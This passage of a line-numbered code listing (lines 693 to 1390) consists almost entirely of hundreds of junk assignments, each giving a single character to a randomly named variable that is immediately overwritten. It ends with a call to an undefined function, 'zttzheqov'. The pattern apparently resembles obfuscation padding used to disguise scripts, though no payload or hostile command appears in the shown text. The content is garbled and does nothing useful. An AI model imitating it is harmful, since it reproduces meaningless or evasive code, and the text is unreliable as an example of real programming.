693 | lbhgtfkr = "B"; | |
694 | lbhgtfkr = "z"; | |
695 | lbhgtfkr = "p"; | |
696 | lbhgtfkr = "S"; | |
697 | lbhgtfkr = "Y"; | |
698 | lbhgtfkr = "m"; | |
699 | lbhgtfkr = "i"; | |
700 | lbhgtfkr = "e"; | |
701 | lbhgtfkr = "w"; | |
702 | jnkmzys = "E"; | |
703 | jnkmzys = "M"; | |
704 | jnkmzys = "E"; | |
705 | jnkmzys = "x"; | |
706 | jnkmzys = "D"; | |
707 | jnkmzys = "x"; | |
708 | jnkmzys = "J"; | |
709 | jnkmzys = "B"; | |
710 | jnkmzys = "w"; | |
711 | jnkmzys = "g"; | |
712 | jnkmzys = "X"; | |
713 | jnkmzys = "w"; | |
714 | jnkmzys = "w"; | |
715 | jnkmzys = "r"; | |
716 | jnkmzys = "E"; | |
717 | jnkmzys = "d"; | |
718 | jnkmzys = "z"; | |
719 | jnkmzys = "T"; | |
720 | jnkmzys = "i"; | |
721 | jnkmzys = "w"; | |
722 | jnkmzys = "p"; | |
723 | jnkmzys = "G"; | |
724 | jnkmzys = "F"; | |
725 | jnkmzys = "K"; | |
726 | jnkmzys = "L"; | |
727 | jnkmzys = "t"; | |
728 | jnkmzys = "H"; | |
729 | jnkmzys = "S"; | |
730 | jnkmzys = "x"; | |
731 | jnkmzys = "m"; | |
732 | pzuxg = "I"; | |
733 | pzuxg = "q"; | |
734 | pzuxg = "H"; | |
735 | pzuxg = "w"; | |
736 | pzuxg = "x"; | |
737 | pzuxg = "n"; | |
738 | jowpjb = "U"; | |
739 | jowpjb = "d"; | |
740 | jowpjb = "o"; | |
741 | jowpjb = "u"; | |
742 | jowpjb = "z"; | |
743 | jowpjb = "C"; | |
744 | jowpjb = "V"; | |
745 | jowpjb = "q"; | |
746 | jowpjb = "I"; | |
747 | wxvsbazr = "w"; | |
748 | wxvsbazr = "v"; | |
749 | wxvsbazr = "G"; | |
750 | wxvsbazr = "Y"; | |
751 | wxvsbazr = "f"; | |
752 | wxvsbazr = "Z"; | |
753 | wxvsbazr = "s"; | |
754 | wxvsbazr = "o"; | |
755 | wxvsbazr = "/"; | |
756 | hiahhd = "Z"; | |
757 | hiahhd = "l"; | |
758 | hiahhd = "y"; | |
759 | hiahhd = "R"; | |
760 | hiahhd = "N"; | |
761 | hiahhd = "i"; | |
762 | lfpfsemp = "K"; | |
763 | lfpfsemp = "N"; | |
764 | lfpfsemp = "d"; | |
765 | lfpfsemp = "H"; | |
766 | lfpfsemp = "U"; | |
767 | lfpfsemp = "i"; | |
768 | lfpfsemp = "g"; | |
769 | lfpfsemp = "E"; | |
770 | lfpfsemp = "c"; | |
771 | lfpfsemp = "X"; | |
772 | lfpfsemp = "q"; | |
773 | lfpfsemp = "w"; | |
774 | lfpfsemp = "R"; | |
775 | xqvsj = "b"; | |
776 | xqvsj = "S"; | |
777 | xqvsj = "Y"; | |
778 | xqvsj = "h"; | |
779 | aimfopbnm = "y"; | |
780 | aimfopbnm = "Q"; | |
781 | aimfopbnm = "w"; | |
782 | aimfopbnm = "I"; | |
783 | aimfopbnm = "z"; | |
784 | aimfopbnm = "T"; | |
785 | aimfopbnm = "l"; | |
786 | aimfopbnm = "l"; | |
787 | aimfopbnm = "I"; | |
788 | aimfopbnm = "E"; | |
789 | aimfopbnm = "F"; | |
790 | aimfopbnm = "f"; | |
791 | aimfopbnm = "g"; | |
792 | aimfopbnm = "a"; | |
793 | aimfopbnm = "a"; | |
794 | aimfopbnm = "I"; | |
795 | aimfopbnm = "Z"; | |
796 | aimfopbnm = "b"; | |
797 | aimfopbnm = "u"; | |
798 | aimfopbnm = "N"; | |
799 | aimfopbnm = "m"; | |
800 | aimfopbnm = "z"; | |
801 | aimfopbnm = "S"; | |
802 | aimfopbnm = "t"; | |
803 | aimfopbnm = "H"; | |
804 | aimfopbnm = "q"; | |
805 | aimfopbnm = "f"; | |
806 | aimfopbnm = "b"; | |
807 | aimfopbnm = "G"; | |
808 | aimfopbnm = "R"; | |
809 | aimfopbnm = "V"; | |
810 | aimfopbnm = "S"; | |
811 | aimfopbnm = "k"; | |
812 | aimfopbnm = "T"; | |
813 | aimfopbnm = "n"; | |
814 | aimfopbnm = "V"; | |
815 | aimfopbnm = "D"; | |
816 | aimfopbnm = "P"; | |
817 | gmwena = "f"; | |
818 | gmwena = "e"; | |
819 | gmwena = "o"; | |
820 | gmwena = "W"; | |
821 | gmwena = "R"; | |
822 | gmwena = "L"; | |
823 | gmwena = "X"; | |
824 | gmwena = "A"; | |
825 | gmwena = "a"; | |
826 | gmwena = "X"; | |
827 | gmwena = "t"; | |
828 | gmwena = "Z"; | |
829 | gmwena = "c"; | |
830 | gmwena = "D"; | |
831 | gmwena = "p"; | |
832 | gmwena = "o"; | |
833 | gmwena = "D"; | |
834 | gmwena = "G"; | |
835 | gmwena = "x"; | |
836 | gmwena = "c"; | |
837 | gmwena = "c"; | |
838 | gmwena = "x"; | |
839 | ylhavnv = "I"; | |
840 | ylhavnv = "Y"; | |
841 | ylhavnv = "G"; | |
842 | ylhavnv = "R"; | |
843 | ylhavnv = "x"; | |
844 | ylhavnv = "o"; | |
845 | ylhavnv = "x"; | |
846 | ylhavnv = "g"; | |
847 | qdkwym = "u"; | |
848 | qdkwym = "Y"; | |
849 | qdkwym = "j"; | |
850 | qdkwym = "J"; | |
851 | qdkwym = "r"; | |
852 | qdkwym = "S"; | |
853 | qdkwym = "u"; | |
854 | qdkwym = "v"; | |
855 | qdkwym = "n"; | |
856 | qdkwym = "S"; | |
857 | qdkwym = "a"; | |
858 | qdkwym = "f"; | |
859 | qdkwym = "T"; | |
860 | qdkwym = "K"; | |
861 | qdkwym = "q"; | |
862 | qdkwym = "s"; | |
863 | qdkwym = "J"; | |
864 | qdkwym = "A"; | |
865 | qdkwym = "z"; | |
866 | qdkwym = "V"; | |
867 | qdkwym = "v"; | |
868 | qdkwym = "Z"; | |
869 | qdkwym = "x"; | |
870 | qdkwym = "c"; | |
871 | qdkwym = "p"; | |
872 | qdkwym = "C"; | |
873 | qdkwym = "r"; | |
874 | qdkwym = "a"; | |
875 | qdkwym = "J"; | |
876 | qdkwym = "M"; | |
877 | qdkwym = "o"; | |
878 | qdkwym = "y"; | |
879 | qdkwym = "N"; | |
880 | qdkwym = "c"; | |
881 | qdkwym = "_"; | |
882 | wvpjbqq = "K"; | |
883 | wvpjbqq = "X"; | |
884 | wvpjbqq = "V"; | |
885 | wvpjbqq = "F"; | |
886 | wvpjbqq = "g"; | |
887 | wvpjbqq = "g"; | |
888 | wvpjbqq = "W"; | |
889 | wvpjbqq = "E"; | |
890 | wvpjbqq = "i"; | |
891 | wvpjbqq = "T"; | |
892 | rgbwkpfpk = "d"; | |
893 | rgbwkpfpk = "E"; | |
894 | rgbwkpfpk = "I"; | |
895 | rgbwkpfpk = "U"; | |
896 | rgbwkpfpk = "w"; | |
897 | rgbwkpfpk = "r"; | |
898 | rgbwkpfpk = "K"; | |
899 | rgbwkpfpk = "h"; | |
900 | rgbwkpfpk = "v"; | |
901 | rgbwkpfpk = "n"; | |
902 | rgbwkpfpk = "d"; | |
903 | rgbwkpfpk = "m"; | |
904 | rgbwkpfpk = "h"; | |
905 | rgbwkpfpk = "W"; | |
906 | rgbwkpfpk = "e"; | |
907 | rgbwkpfpk = "v"; | |
908 | rgbwkpfpk = "e"; | |
909 | rgbwkpfpk = "B"; | |
910 | rgbwkpfpk = "B"; | |
911 | rgbwkpfpk = "w"; | |
912 | rgbwkpfpk = "F"; | |
913 | rgbwkpfpk = "F"; | |
914 | rgbwkpfpk = "k"; | |
915 | rgbwkpfpk = "A"; | |
916 | rgbwkpfpk = "x"; | |
917 | rgbwkpfpk = "p"; | |
918 | rgbwkpfpk = "w"; | |
919 | rgbwkpfpk = "D"; | |
920 | rgbwkpfpk = "S"; | |
921 | rgbwkpfpk = "d"; | |
922 | rgbwkpfpk = "J"; | |
923 | rgbwkpfpk = "P"; | |
924 | rgbwkpfpk = "\""; | |
925 | vmhnbzyr = "N"; | |
926 | vmhnbzyr = "O"; | |
927 | vmhnbzyr = "I"; | |
928 | vmhnbzyr = "V"; | |
929 | vmhnbzyr = "c"; | |
930 | vmhnbzyr = "U"; | |
931 | vmhnbzyr = "Q"; | |
932 | vmhnbzyr = "B"; | |
933 | vmhnbzyr = "Z"; | |
934 | vmhnbzyr = "q"; | |
935 | vmhnbzyr = "M"; | |
936 | vmhnbzyr = "d"; | |
937 | vmhnbzyr = "v"; | |
938 | vmhnbzyr = "I"; | |
939 | vmhnbzyr = "Z"; | |
940 | vmhnbzyr = "A"; | |
941 | vmhnbzyr = "M"; | |
942 | vmhnbzyr = "x"; | |
943 | vmhnbzyr = "R"; | |
944 | vmhnbzyr = "R"; | |
945 | vmhnbzyr = "v"; | |
946 | vmhnbzyr = "E"; | |
947 | vmhnbzyr = "U"; | |
948 | vmhnbzyr = "s"; | |
949 | vmhnbzyr = "C"; | |
950 | vmhnbzyr = "D"; | |
951 | vmhnbzyr = "v"; | |
952 | vmhnbzyr = "a"; | |
953 | vmhnbzyr = "y"; | |
954 | vmhnbzyr = "k"; | |
955 | vmhnbzyr = "d"; | |
956 | vmhnbzyr = "n"; | |
957 | vmhnbzyr = "U"; | |
958 | vmhnbzyr = "z"; | |
959 | vmhnbzyr = "i"; | |
960 | vmhnbzyr = "F"; | |
961 | xjpkene = "q"; | |
962 | xjpkene = "a"; | |
963 | xjpkene = "o"; | |
964 | xjpkene = "P"; | |
965 | xjpkene = "p"; | |
966 | bxmvog = "o"; | |
967 | bxmvog = "F"; | |
968 | bxmvog = "T"; | |
969 | bxmvog = "P"; | |
970 | bxmvog = "K"; | |
971 | bxmvog = "u"; | |
972 | bxmvog = "T"; | |
973 | bxmvog = "V"; | |
974 | bxmvog = "Y"; | |
975 | bxmvog = "I"; | |
976 | bxmvog = "V"; | |
977 | bxmvog = "n"; | |
978 | bxmvog = "a"; | |
979 | bxmvog = "E"; | |
980 | bxmvog = "o"; | |
981 | bxmvog = "N"; | |
982 | bxmvog = "j"; | |
983 | bxmvog = "e"; | |
984 | bxmvog = "z"; | |
985 | bxmvog = "K"; | |
986 | bxmvog = "R"; | |
987 | bxmvog = "H"; | |
988 | bxmvog = "l"; | |
989 | bxmvog = "q"; | |
990 | bxmvog = "r"; | |
991 | bxmvog = "b"; | |
992 | bxmvog = "L"; | |
993 | bxmvog = "k"; | |
994 | bxmvog = "h"; | |
995 | bxmvog = "w"; | |
996 | bxmvog = "m"; | |
997 | bxmvog = "a"; | |
998 | bxmvog = "n"; | |
999 | bxmvog = "A"; | |
1000 | bxmvog = "Q"; | |
1001 | bxmvog = "5"; | |
1002 | wszcrynrz = "q"; | |
1003 | wszcrynrz = "K"; | |
1004 | wszcrynrz = "r"; | |
1005 | wszcrynrz = "X"; | |
1006 | wszcrynrz = "h"; | |
1007 | wszcrynrz = "V"; | |
1008 | wszcrynrz = "U"; | |
1009 | wszcrynrz = "s"; | |
1010 | wszcrynrz = "P"; | |
1011 | wszcrynrz = "s"; | |
1012 | wszcrynrz = "v"; | |
1013 | wszcrynrz = "y"; | |
1014 | wszcrynrz = "P"; | |
1015 | wszcrynrz = "u"; | |
1016 | wszcrynrz = "c"; | |
1017 | wszcrynrz = "w"; | |
1018 | wszcrynrz = "o"; | |
1019 | wszcrynrz = "C"; | |
1020 | wszcrynrz = "a"; | |
1021 | wszcrynrz = "A"; | |
1022 | wszcrynrz = "o"; | |
1023 | wszcrynrz = "Z"; | |
1024 | wszcrynrz = "D"; | |
1025 | wszcrynrz = "o"; | |
1026 | wszcrynrz = "X"; | |
1027 | wszcrynrz = "O"; | |
1028 | wszcrynrz = "f"; | |
1029 | wszcrynrz = "v"; | |
1030 | wszcrynrz = "F"; | |
1031 | wszcrynrz = "H"; | |
1032 | wszcrynrz = " "; | |
1033 | bocpk = "K"; | |
1034 | bocpk = "h"; | |
1035 | bocpk = "Q"; | |
1036 | bocpk = "A"; | |
1037 | bocpk = "H"; | |
1038 | bocpk = "H"; | |
1039 | bocpk = "J"; | |
1040 | bocpk = "h"; | |
1041 | bocpk = "z"; | |
1042 | bocpk = "k"; | |
1043 | bocpk = "Z"; | |
1044 | bocpk = "d"; | |
1045 | bocpk = "B"; | |
1046 | bocpk = "r"; | |
1047 | bocpk = "u"; | |
1048 | bocpk = "x"; | |
1049 | bocpk = "S"; | |
1050 | bocpk = "v"; | |
1051 | bocpk = "P"; | |
1052 | bocpk = "t"; | |
1053 | bocpk = "r"; | |
1054 | avvacjrts = "W"; | |
1055 | avvacjrts = "A"; | |
1056 | avvacjrts = "S"; | |
1057 | avvacjrts = "X"; | |
1058 | avvacjrts = "T"; | |
1059 | avvacjrts = "D"; | |
1060 | avvacjrts = "Q"; | |
1061 | avvacjrts = "S"; | |
1062 | avvacjrts = "W"; | |
1063 | avvacjrts = "y"; | |
1064 | avvacjrts = "p"; | |
1065 | avvacjrts = "y"; | |
1066 | avvacjrts = "i"; | |
1067 | avvacjrts = "Z"; | |
1068 | avvacjrts = "F"; | |
1069 | avvacjrts = "k"; | |
1070 | avvacjrts = "y"; | |
1071 | avvacjrts = "c"; | |
1072 | avvacjrts = "c"; | |
1073 | avvacjrts = "r"; | |
1074 | avvacjrts = "V"; | |
1075 | avvacjrts = "T"; | |
1076 | avvacjrts = "y"; | |
1077 | avvacjrts = "j"; | |
1078 | avvacjrts = "u"; | |
1079 | avvacjrts = "p"; | |
1080 | avvacjrts = "e"; | |
1081 | avvacjrts = "Z"; | |
1082 | avvacjrts = "E"; | |
1083 | avvacjrts = "m"; | |
1084 | avvacjrts = "I"; | |
1085 | avvacjrts = "d"; | |
1086 | avvacjrts = "g"; | |
1087 | avvacjrts = "y"; | |
1088 | avvacjrts = "N"; | |
1089 | avvacjrts = "G"; | |
1090 | avvacjrts = "Q"; | |
1091 | qzsatdlpq = "N"; | |
1092 | qzsatdlpq = "K"; | |
1093 | qzsatdlpq = "m"; | |
1094 | qzsatdlpq = "Z"; | |
1095 | qzsatdlpq = "C"; | |
1096 | swxsymme = "O"; | |
1097 | swxsymme = "f"; | |
1098 | swxsymme = "I"; | |
1099 | swxsymme = "R"; | |
1100 | swxsymme = "D"; | |
1101 | swxsymme = "t"; | |
1102 | swxsymme = "U"; | |
1103 | swxsymme = "."; | |
1104 | pkjojy = "R"; | |
1105 | pkjojy = "Q"; | |
1106 | pkjojy = "U"; | |
1107 | pkjojy = "x"; | |
1108 | pkjojy = "p"; | |
1109 | pkjojy = "p"; | |
1110 | pkjojy = "a"; | |
1111 | pkjojy = "F"; | |
1112 | pkjojy = "e"; | |
1113 | pkjojy = "M"; | |
1114 | pkjojy = "l"; | |
1115 | pkjojy = "G"; | |
1116 | pkjojy = "m"; | |
1117 | pkjojy = "M"; | |
1118 | pkjojy = "a"; | |
1119 | pkjojy = "u"; | |
1120 | pkjojy = "y"; | |
1121 | pkjojy = "m"; | |
1122 | pkjojy = "v"; | |
1123 | pkjojy = "t"; | |
1124 | pkjojy = "B"; | |
1125 | pkjojy = "e"; | |
1126 | pkjojy = "o"; | |
1127 | pkjojy = "m"; | |
1128 | pkjojy = "H"; | |
1129 | pkjojy = "D"; | |
1130 | pkjojy = "A"; | |
1131 | pkjojy = "N"; | |
1132 | pkjojy = "V"; | |
1133 | pkjojy = "B"; | |
1134 | pkjojy = "F"; | |
1135 | pkjojy = "Z"; | |
1136 | pkjojy = "v"; | |
1137 | pkjojy = "d"; | |
1138 | pkjojy = "M"; | |
1139 | pkjojy = "U"; | |
1140 | odumbjkie = "Z"; | |
1141 | odumbjkie = "T"; | |
1142 | odumbjkie = "c"; | |
1143 | odumbjkie = "H"; | |
1144 | odumbjkie = "k"; | |
1145 | odumbjkie = "K"; | |
1146 | odumbjkie = "O"; | |
1147 | odumbjkie = "n"; | |
1148 | odumbjkie = "w"; | |
1149 | odumbjkie = "E"; | |
1150 | odumbjkie = "l"; | |
1151 | odumbjkie = "K"; | |
1152 | odumbjkie = "h"; | |
1153 | odumbjkie = "W"; | |
1154 | odumbjkie = "b"; | |
1155 | odumbjkie = "x"; | |
1156 | odumbjkie = "k"; | |
1157 | odumbjkie = "d"; | |
1158 | odumbjkie = "j"; | |
1159 | odumbjkie = "M"; | |
1160 | odumbjkie = "F"; | |
1161 | odumbjkie = "B"; | |
1162 | odumbjkie = "z"; | |
1163 | odumbjkie = "b"; | |
1164 | odumbjkie = "M"; | |
1165 | odumbjkie = "J"; | |
1166 | odumbjkie = "v"; | |
1167 | odumbjkie = "x"; | |
1168 | odumbjkie = "r"; | |
1169 | odumbjkie = "x"; | |
1170 | odumbjkie = "T"; | |
1171 | odumbjkie = "1"; | |
1172 | fnxnoen = "e"; | |
1173 | fnxnoen = "i"; | |
1174 | fnxnoen = "x"; | |
1175 | fnxnoen = "b"; | |
1176 | fnxnoen = "L"; | |
1177 | fnxnoen = "d"; | |
1178 | fnxnoen = "Z"; | |
1179 | fnxnoen = "t"; | |
1180 | fnxnoen = "i"; | |
1181 | fnxnoen = "H"; | |
1182 | fnxnoen = "h"; | |
1183 | fnxnoen = "m"; | |
1184 | fnxnoen = "S"; | |
1185 | fnxnoen = "E"; | |
1186 | fnxnoen = "y"; | |
1187 | fnxnoen = "c"; | |
1188 | fnxnoen = "X"; | |
1189 | fnxnoen = "H"; | |
1190 | gqccx = "c"; | |
1191 | gqccx = "w"; | |
1192 | gqccx = "i"; | |
1193 | gqccx = "E"; | |
1194 | gqccx = "d"; | |
1195 | gqccx = "f"; | |
1196 | gqccx = "n"; | |
1197 | gqccx = "S"; | |
1198 | gqccx = "u"; | |
1199 | gqccx = "N"; | |
1200 | gqccx = "C"; | |
1201 | gqccx = "c"; | |
1202 | gqccx = "H"; | |
1203 | gqccx = "M"; | |
1204 | gqccx = "J"; | |
1205 | gqccx = "S"; | |
1206 | gqccx = "N"; | |
1207 | hueuwebgo = "j"; | |
1208 | hueuwebgo = "h"; | |
1209 | hueuwebgo = "O"; | |
1210 | hueuwebgo = "c"; | |
1211 | hueuwebgo = "C"; | |
1212 | hueuwebgo = "L"; | |
1213 | hueuwebgo = "v"; | |
1214 | hueuwebgo = "W"; | |
1215 | hueuwebgo = "v"; | |
1216 | hueuwebgo = "O"; | |
1217 | hueuwebgo = "g"; | |
1218 | hueuwebgo = "x"; | |
1219 | hueuwebgo = "C"; | |
1220 | hueuwebgo = "C"; | |
1221 | hueuwebgo = "k"; | |
1222 | hueuwebgo = "C"; | |
1223 | hueuwebgo = "f"; | |
1224 | hueuwebgo = "d"; | |
1225 | hueuwebgo = "W"; | |
1226 | hueuwebgo = "k"; | |
1227 | hueuwebgo = "x"; | |
1228 | hueuwebgo = "f"; | |
1229 | hueuwebgo = "M"; | |
1230 | hueuwebgo = "z"; | |
1231 | hueuwebgo = "K"; | |
1232 | hueuwebgo = "S"; | |
1233 | hueuwebgo = "O"; | |
1234 | hueuwebgo = "h"; | |
1235 | hueuwebgo = "f"; | |
1236 | hueuwebgo = "H"; | |
1237 | hueuwebgo = "s"; | |
1238 | hueuwebgo = "H"; | |
1239 | hueuwebgo = "q"; | |
1240 | hueuwebgo = "G"; | |
1241 | hueuwebgo = "R"; | |
1242 | hueuwebgo = "W"; | |
1243 | hueuwebgo = "i"; | |
1244 | hueuwebgo = "3"; | |
1245 | czflbo = "x"; | |
1246 | czflbo = "S"; | |
1247 | qbpjik = "U"; | |
1248 | qbpjik = "S"; | |
1249 | qbpjik = "R"; | |
1250 | qbpjik = "x"; | |
1251 | qbpjik = "a"; | |
1252 | qbpjik = "L"; | |
1253 | qbpjik = "q"; | |
1254 | qbpjik = "h"; | |
1255 | qbpjik = "p"; | |
1256 | qbpjik = "D"; | |
1257 | qbpjik = "b"; | |
1258 | qbpjik = "h"; | |
1259 | qbpjik = "K"; | |
1260 | qbpjik = "j"; | |
1261 | qbpjik = "K"; | |
1262 | qbpjik = "L"; | |
1263 | qbpjik = "e"; | |
1264 | qbpjik = "L"; | |
1265 | qbpjik = "s"; | |
1266 | qbpjik = "R"; | |
1267 | qbpjik = "P"; | |
1268 | qbpjik = "L"; | |
1269 | qbpjik = "d"; | |
1270 | qbpjik = "Y"; | |
1271 | qbpjik = "O"; | |
1272 | qbpjik = "e"; | |
1273 | qbpjik = "n"; | |
1274 | qbpjik = "X"; | |
1275 | qbpjik = "O"; | |
1276 | qbpjik = "o"; | |
1277 | qbpjik = "N"; | |
1278 | qbpjik = "w"; | |
1279 | qbpjik = "w"; | |
1280 | qbpjik = "J"; | |
1281 | qbpjik = "Z"; | |
1282 | qbpjik = "O"; | |
1283 | qbpjik = "Q"; | |
1284 | qbpjik = "m"; | |
1285 | qbpjik = "j"; | |
1286 | qbpjik = "2"; | |
1287 | ikwapjmn = "i"; | |
1288 | ikwapjmn = "O"; | |
1289 | ikwapjmn = "R"; | |
1290 | ikwapjmn = "z"; | |
1291 | ikwapjmn = "R"; | |
1292 | ikwapjmn = "j"; | |
1293 | ikwapjmn = "i"; | |
1294 | ikwapjmn = "4"; | |
1295 | owsfhu = "k"; | |
1296 | owsfhu = "Z"; | |
1297 | owsfhu = "K"; | |
1298 | owsfhu = "b"; | |
1299 | owsfhu = "A"; | |
1300 | owsfhu = "U"; | |
1301 | owsfhu = "K"; | |
1302 | owsfhu = "g"; | |
1303 | owsfhu = "U"; | |
1304 | owsfhu = "G"; | |
1305 | owsfhu = "X"; | |
1306 | owsfhu = "D"; | |
1307 | owsfhu = "D"; | |
1308 | owsfhu = "p"; | |
1309 | owsfhu = "I"; | |
1310 | owsfhu = "m"; | |
1311 | owsfhu = "T"; | |
1312 | owsfhu = "R"; | |
1313 | owsfhu = "r"; | |
1314 | owsfhu = "M"; | |
1315 | owsfhu = "C"; | |
1316 | owsfhu = "d"; | |
1317 | owsfhu = "P"; | |
1318 | owsfhu = "t"; | |
1319 | owsfhu = "t"; | |
1320 | owsfhu = "a"; | |
1321 | owsfhu = "k"; | |
1322 | owsfhu = "y"; | |
1323 | owsfhu = "X"; | |
1324 | owsfhu = "P"; | |
1325 | owsfhu = "e"; | |
1326 | owsfhu = "O"; | |
1327 | jopwbwok = "U"; | |
1328 | jopwbwok = "s"; | |
1329 | jopwbwok = "H"; | |
1330 | jopwbwok = "B"; | |
1331 | jopwbwok = "u"; | |
1332 | jopwbwok = "g"; | |
1333 | jopwbwok = "h"; | |
1334 | jopwbwok = "n"; | |
1335 | jopwbwok = "h"; | |
1336 | jopwbwok = "M"; | |
1337 | jopwbwok = "J"; | |
1338 | jopwbwok = "a"; | |
1339 | jopwbwok = "X"; | |
1340 | jopwbwok = "c"; | |
1341 | jopwbwok = "w"; | |
1342 | jopwbwok = "B"; | |
1343 | jopwbwok = "W"; | |
1344 | jopwbwok = "K"; | |
1345 | jopwbwok = "y"; | |
1346 | jopwbwok = "S"; | |
1347 | jopwbwok = "S"; | |
1348 | jopwbwok = "l"; | |
1349 | znzngdifv = "m"; | |
1350 | znzngdifv = "z"; | |
1351 | znzngdifv = "l"; | |
1352 | znzngdifv = "R"; | |
1353 | znzngdifv = "u"; | |
1354 | znzngdifv = "y"; | |
1355 | znzngdifv = "z"; | |
1356 | znzngdifv = "o"; | |
1357 | znzngdifv = "Q"; | |
1358 | znzngdifv = "A"; | |
1359 | znzngdifv = "F"; | |
1360 | znzngdifv = "m"; | |
1361 | znzngdifv = "e"; | |
1362 | znzngdifv = "X"; | |
1363 | znzngdifv = "b"; | |
1364 | znzngdifv = "N"; | |
1365 | znzngdifv = "B"; | |
1366 | znzngdifv = "l"; | |
1367 | znzngdifv = "K"; | |
1368 | znzngdifv = "w"; | |
1369 | znzngdifv = "U"; | |
1370 | znzngdifv = "T"; | |
1371 | znzngdifv = "y"; | |
1372 | znzngdifv = "C"; | |
1373 | znzngdifv = "z"; | |
1374 | znzngdifv = "n"; | |
1375 | znzngdifv = "E"; | |
1376 | znzngdifv = "W"; | |
1377 | znzngdifv = "c"; | |
1378 | znzngdifv = "U"; | |
1379 | znzngdifv = "F"; | |
1380 | znzngdifv = "S"; | |
1381 | znzngdifv = "M"; | |
1382 | znzngdifv = "g"; | |
1383 | znzngdifv = "S"; | |
1384 | znzngdifv = "Z"; | |
1385 | znzngdifv = "X"; | |
1386 | znzngdifv = "W"; | |
1387 | znzngdifv = "s"; | |
1388 | znzngdifv = "a"; | |
1389 | znzngdifv = "\\"; | |
1390 | zttzheqov ( ); |
|